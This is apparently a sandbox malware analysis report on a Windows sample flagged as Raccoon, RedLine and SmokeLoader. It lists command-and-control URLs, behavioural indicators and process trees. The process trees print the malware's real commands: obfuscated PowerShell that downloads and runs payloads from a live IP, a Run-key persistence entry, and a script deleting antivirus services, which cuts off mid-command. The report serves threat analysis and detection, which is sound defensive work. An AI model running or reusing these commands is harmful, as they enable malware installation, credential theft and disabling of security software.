raccoon | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a70270e30e666c9baa7d

Analysis

max time kernel
150s
max time network
119s
platform
windows10_x64
resource
win10v20210408
submitted
11-08-2021 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Size

207KB
MD5

4a24658b8b28d1512378d374676846dc
SHA1

1d326b774e7f11bcaffbdb4198db8cc47735e808
SHA256

d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a70270e30e666c9baa7d
SHA512

c762af1ea682cfa41bdb211a74cce91600da32ccace258e6dd0b2ed9eb02bad2d01922ef9ccc00a6b1c909d8fe7e3955ded408a0f643da75fcfbb805de4b6d3c

Score

10^/10

raccoon redline smokeloader 2ca2376c561d1af7f8b9e6f3256b06220a3db187 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor discovery evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes

url4cnc
https://telete.in/johnyes13

rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1216-147-0x0000000004970000-0x0000000004A03000-memory.dmp	family_raccoon
behavioral2/memory/1216-154-0x0000000000400000-0x0000000002CB1000-memory.dmp	family_raccoon
behavioral2/memory/3864-159-0x0000000000400000-0x0000000002CB0000-memory.dmp	family_raccoon
behavioral2/memory/2168-215-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/2168-222-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1A9F.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1A9F.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 3160 created 1216 3160 WerFault.exe 1DBD.exe
PID 792 created 3864 792 WerFault.exe 1F25.exe
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

34 4136 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

1389.exe1520.exe1A9F.exe1DBD.exe1F25.exeRuntimebroker.exe1520.exe

pid process

2044 1389.exe
768 1520.exe
4028 1A9F.exe
1216 1DBD.exe
3864 1F25.exe
684 Runtimebroker.exe
2168 1520.exe

description	pid	process	target process
PID 3160 created 1216	3160	WerFault.exe	1DBD.exe
PID 792 created 3864	792	WerFault.exe	1F25.exe

flow	pid	process
34	4136	powershell.exe

pid	process
2044	1389.exe
768	1520.exe
4028	1A9F.exe
1216	1DBD.exe
3864	1F25.exe
684	Runtimebroker.exe
2168	1520.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1A9F.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1A9F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1A9F.exe

Deletes itself 1 IoCs

Processes:

pid process

2428
Drops startup file 1 IoCs

Processes:

Runtimebroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2428

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1A9F.exe	themida
C:\Users\Admin\AppData\Local\Temp\1A9F.exe	themida
behavioral2/memory/4028-140-0x00000000008A0000-0x00000000008A1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

1A9F.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1A9F.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

1A9F.exe

pid process

4028 1A9F.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1A9F.exe

pid	process
4028	1A9F.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe1520.exe

description	pid	process	target process
PID 632 set thread context of 3188	632	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 768 set thread context of 2168	768	1520.exe	1520.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1820	2044	WerFault.exe	1389.exe
3820	2044	WerFault.exe	1389.exe
2736	1216	WerFault.exe	1DBD.exe
792	2044	WerFault.exe	1389.exe
1264	3864	WerFault.exe	1F25.exe
996	2044	WerFault.exe	1389.exe
2904	1216	WerFault.exe	1DBD.exe
2392	3864	WerFault.exe	1F25.exe
1920	2044	WerFault.exe	1389.exe
1944	1216	WerFault.exe	1DBD.exe
4052	3864	WerFault.exe	1F25.exe
3364	1216	WerFault.exe	1DBD.exe
1156	2044	WerFault.exe	1389.exe
3192	3864	WerFault.exe	1F25.exe
3160	1216	WerFault.exe	1DBD.exe
792	3864	WerFault.exe	1F25.exe
2284	684	WerFault.exe	Runtimebroker.exe
1920	684	WerFault.exe	Runtimebroker.exe
3888	684	WerFault.exe	Runtimebroker.exe
1012	684	WerFault.exe	Runtimebroker.exe
3820	684	WerFault.exe	Runtimebroker.exe
2188	684	WerFault.exe	Runtimebroker.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe

pid	process
3188	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
3188	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2428
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe

pid process

3188 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428

pid	process
2428

Suspicious use of AdjustPrivilegeToken 61 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe1A9F.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe1520.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeRestorePrivilege	1820	WerFault.exe
Token: SeBackupPrivilege	1820	WerFault.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeDebugPrivilege	1820	WerFault.exe
Token: SeDebugPrivilege	3820	WerFault.exe
Token: SeDebugPrivilege	2736	WerFault.exe
Token: SeDebugPrivilege	792	WerFault.exe
Token: SeDebugPrivilege	1264	WerFault.exe
Token: SeDebugPrivilege	996	WerFault.exe
Token: SeDebugPrivilege	2904	WerFault.exe
Token: SeDebugPrivilege	2392	WerFault.exe
Token: SeDebugPrivilege	1920	WerFault.exe
Token: SeDebugPrivilege	1944	WerFault.exe
Token: SeDebugPrivilege	4052	WerFault.exe
Token: SeDebugPrivilege	1156	WerFault.exe
Token: SeDebugPrivilege	3364	WerFault.exe
Token: SeDebugPrivilege	3192	WerFault.exe
Token: SeDebugPrivilege	3160	WerFault.exe
Token: SeDebugPrivilege	4028	1A9F.exe
Token: SeDebugPrivilege	792	WerFault.exe
Token: SeDebugPrivilege	2284	WerFault.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeDebugPrivilege	1920	WerFault.exe
Token: SeDebugPrivilege	3888	WerFault.exe
Token: SeDebugPrivilege	1012	WerFault.exe
Token: SeDebugPrivilege	3820	WerFault.exe
Token: SeDebugPrivilege	2188	WerFault.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	768	1520.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2428

pid	process
2428

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe1389.exeRuntimebroker.exe1520.exe

description	pid	process	target process
PID 632 wrote to memory of 3188	632	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 632 wrote to memory of 3188	632	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 632 wrote to memory of 3188	632	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 632 wrote to memory of 3188	632	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 632 wrote to memory of 3188	632	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 632 wrote to memory of 3188	632	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe	d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 2428 wrote to memory of 2044	2428		1389.exe
PID 2428 wrote to memory of 2044	2428		1389.exe
PID 2428 wrote to memory of 2044	2428		1389.exe
PID 2428 wrote to memory of 768	2428		1520.exe
PID 2428 wrote to memory of 768	2428		1520.exe
PID 2428 wrote to memory of 768	2428		1520.exe
PID 2428 wrote to memory of 4028	2428		1A9F.exe
PID 2428 wrote to memory of 4028	2428		1A9F.exe
PID 2428 wrote to memory of 4028	2428		1A9F.exe
PID 2428 wrote to memory of 1216	2428		1DBD.exe
PID 2428 wrote to memory of 1216	2428		1DBD.exe
PID 2428 wrote to memory of 1216	2428		1DBD.exe
PID 2428 wrote to memory of 3864	2428		1F25.exe
PID 2428 wrote to memory of 3864	2428		1F25.exe
PID 2428 wrote to memory of 3864	2428		1F25.exe
PID 2428 wrote to memory of 3748	2428		explorer.exe
PID 2428 wrote to memory of 3748	2428		explorer.exe
PID 2428 wrote to memory of 3748	2428		explorer.exe
PID 2428 wrote to memory of 3748	2428		explorer.exe
PID 2428 wrote to memory of 2080	2428		explorer.exe
PID 2428 wrote to memory of 2080	2428		explorer.exe
PID 2428 wrote to memory of 2080	2428		explorer.exe
PID 2428 wrote to memory of 3296	2428		explorer.exe
PID 2428 wrote to memory of 3296	2428		explorer.exe
PID 2428 wrote to memory of 3296	2428		explorer.exe
PID 2428 wrote to memory of 3296	2428		explorer.exe
PID 2044 wrote to memory of 684	2044	1389.exe	Runtimebroker.exe
PID 2044 wrote to memory of 684	2044	1389.exe	Runtimebroker.exe
PID 2044 wrote to memory of 684	2044	1389.exe	Runtimebroker.exe
PID 2428 wrote to memory of 3196	2428		explorer.exe
PID 2428 wrote to memory of 3196	2428		explorer.exe
PID 2428 wrote to memory of 3196	2428		explorer.exe
PID 2428 wrote to memory of 2116	2428		explorer.exe
PID 2428 wrote to memory of 2116	2428		explorer.exe
PID 2428 wrote to memory of 2116	2428		explorer.exe
PID 2428 wrote to memory of 2116	2428		explorer.exe
PID 2428 wrote to memory of 2060	2428		explorer.exe
PID 2428 wrote to memory of 2060	2428		explorer.exe
PID 2428 wrote to memory of 2060	2428		explorer.exe
PID 2428 wrote to memory of 1820	2428		explorer.exe
PID 2428 wrote to memory of 1820	2428		explorer.exe
PID 2428 wrote to memory of 1820	2428		explorer.exe
PID 2428 wrote to memory of 1820	2428		explorer.exe
PID 2428 wrote to memory of 1488	2428		explorer.exe
PID 2428 wrote to memory of 1488	2428		explorer.exe
PID 2428 wrote to memory of 1488	2428		explorer.exe
PID 2428 wrote to memory of 3240	2428		explorer.exe
PID 2428 wrote to memory of 3240	2428		explorer.exe
PID 2428 wrote to memory of 3240	2428		explorer.exe
PID 2428 wrote to memory of 3240	2428		explorer.exe
PID 684 wrote to memory of 3488	684	Runtimebroker.exe	powershell.exe
PID 684 wrote to memory of 3488	684	Runtimebroker.exe	powershell.exe
PID 684 wrote to memory of 3488	684	Runtimebroker.exe	powershell.exe
PID 768 wrote to memory of 2168	768	1520.exe	1520.exe
PID 768 wrote to memory of 2168	768	1520.exe	1520.exe
PID 768 wrote to memory of 2168	768	1520.exe	1520.exe
PID 768 wrote to memory of 2168	768	1520.exe	1520.exe
PID 768 wrote to memory of 2168	768	1520.exe	1520.exe

C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:632

C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3188

C:\Users\Admin\AppData\Local\Temp\1389.exe
C:\Users\Admin\AppData\Local\Temp\1389.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 708
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 892
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 660
2⤵
- Program crash
PID:792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 916
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 660
2⤵
- Program crash
PID:1920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 928
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 736
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 788
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 760
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 800
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 1008
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 1036
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t 